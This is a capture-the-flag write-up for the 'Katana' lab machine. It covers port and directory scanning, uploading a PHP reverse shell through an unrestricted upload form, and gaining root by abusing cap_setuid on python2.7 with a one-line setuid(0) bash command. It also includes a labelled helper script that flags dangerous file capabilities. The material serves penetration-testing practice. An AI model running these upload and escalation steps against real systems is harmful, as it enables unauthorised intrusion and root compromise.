Proving Grounds Play: Katana

RATING

Easy

ENUMERATION

First, we kick things off with our usual full-port nmap scan for this type of box:

Command: nmap -sV -sC -T4 -Pn -p- 192.168.163.83

Navigating over to the target in our browser, we don’t see anything of interest.

Directory bruteforcing with feroxbuster on port 80 doesn't turn up anything of interest either. We proceed to directory bruteforce port 8088, this time appending the .html extension to each wordlist entry (-x .html).

This produces the URL http://192.168.163.83:8088/upload.html:

Command: feroxbuster -u http://192.168.163.83:8088/ -w /usr/share/wordlists/dirb/common.txt -k --quiet -s 200 -x .html

EXPLOITATION

Navigating to this in our browser, we see an upload form and upload our PHP reverse shell (don't forget to change the IP and port to match your listener).

Take note of the message returned after the upload, which tells us where the shell has been moved to; the file is served from a different port (8715) than the one we uploaded through:

After starting our netcat listener, navigating to http://192.168.163.83:8715/katana_php_shell.php gets us a shell as www-data:

PRIVILEGE ESCALATION

We check for binaries with the SUID bit set. Nothing interesting here:

Command: find / -perm -u=s -type f 2>/dev/null

We then check for binaries with file capabilities and see that /usr/bin/python2.7 has cap_setuid. Since that capability lets the interpreter change its UID to 0 regardless of who launched it, we can abuse it following GTFOBins:

Command: getcap -r / 2>/dev/null
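On a real engagement the getcap listing is usually longer than one line, so it is worth triaging it rather than eyeballing it. The script below is an added example for this writeup, not part of the original post or of any tool it uses: it reads getcap output, strips the +ep/=ep flag suffix, and flags any binary carrying a capability that gives a straight path to root (cap_setuid being the one that matters on Katana). The sample getcap lines embedded in it are constructed for illustration; run it with --live to parse the real output of getcap -r / on the target.

```sh
#!/bin/sh
# Added example (not from the original writeup): triage `getcap -r / 2>/dev/null`
# output and flag binaries whose file capabilities allow escalation to root,
# as /usr/bin/python2.7 with cap_setuid did on this box.
# Handles both libcap output formats: "/path = caps+ep" (older) and
# "/path caps=ep" (newer).

# Capabilities that hand an unprivileged user root, or root-equivalent file
# access, when set on an interpreter or a general-purpose tool.
DANGEROUS_CAPS="cap_setuid cap_setgid cap_sys_admin cap_dac_override cap_dac_read_search cap_sys_ptrace cap_sys_module cap_chown cap_fowner"

# flag_caps: read getcap lines on stdin, print "path<TAB>capability" for every
# dangerous capability found.
flag_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        case $line in
            *' = '*) path=${line%% = *}; caps=${line#* = } ;;   # older format
            *)       path=${line%% *};   caps=${line#* } ;;     # newer format
        esac
        # Drop the flag suffix (+ep, =ep, +eip ...) and split the list on commas.
        caplist=$(printf '%s' "$caps" | sed -e 's/[+=][a-z]*$//' -e 's/,/ /g')
        for cap in $caplist; do
            for bad in $DANGEROUS_CAPS; do
                [ "$cap" = "$bad" ] && printf '%s\t%s\n' "$path" "$cap"
            done
        done
    done
}

# Constructed sample of what getcap -r / might return on a host like Katana.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
/usr/sbin/arping cap_net_raw=ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep'

# count_dangerous: number of flagged (path, capability) pairs in the sample.
count_dangerous() {
    printf '%s\n' "$SAMPLE_GETCAP" | flag_caps | wc -l | tr -d ' '
}

if [ "${1:-}" = "--live" ]; then
    getcap -r / 2>/dev/null | flag_caps      # real target
else
    printf '%s\n' "$SAMPLE_GETCAP" | flag_caps  # demo on the constructed sample
fi
```

Only the python2.7 line is reported for the sample; cap_net_raw on ping and arping is the normal, harmless case and stays quiet. Once a hit is flagged, the matching GTFOBins entry for that binary and capability tells you how to turn it into a root shell.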

Command: /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

With this, we have a root shell and can read the flag.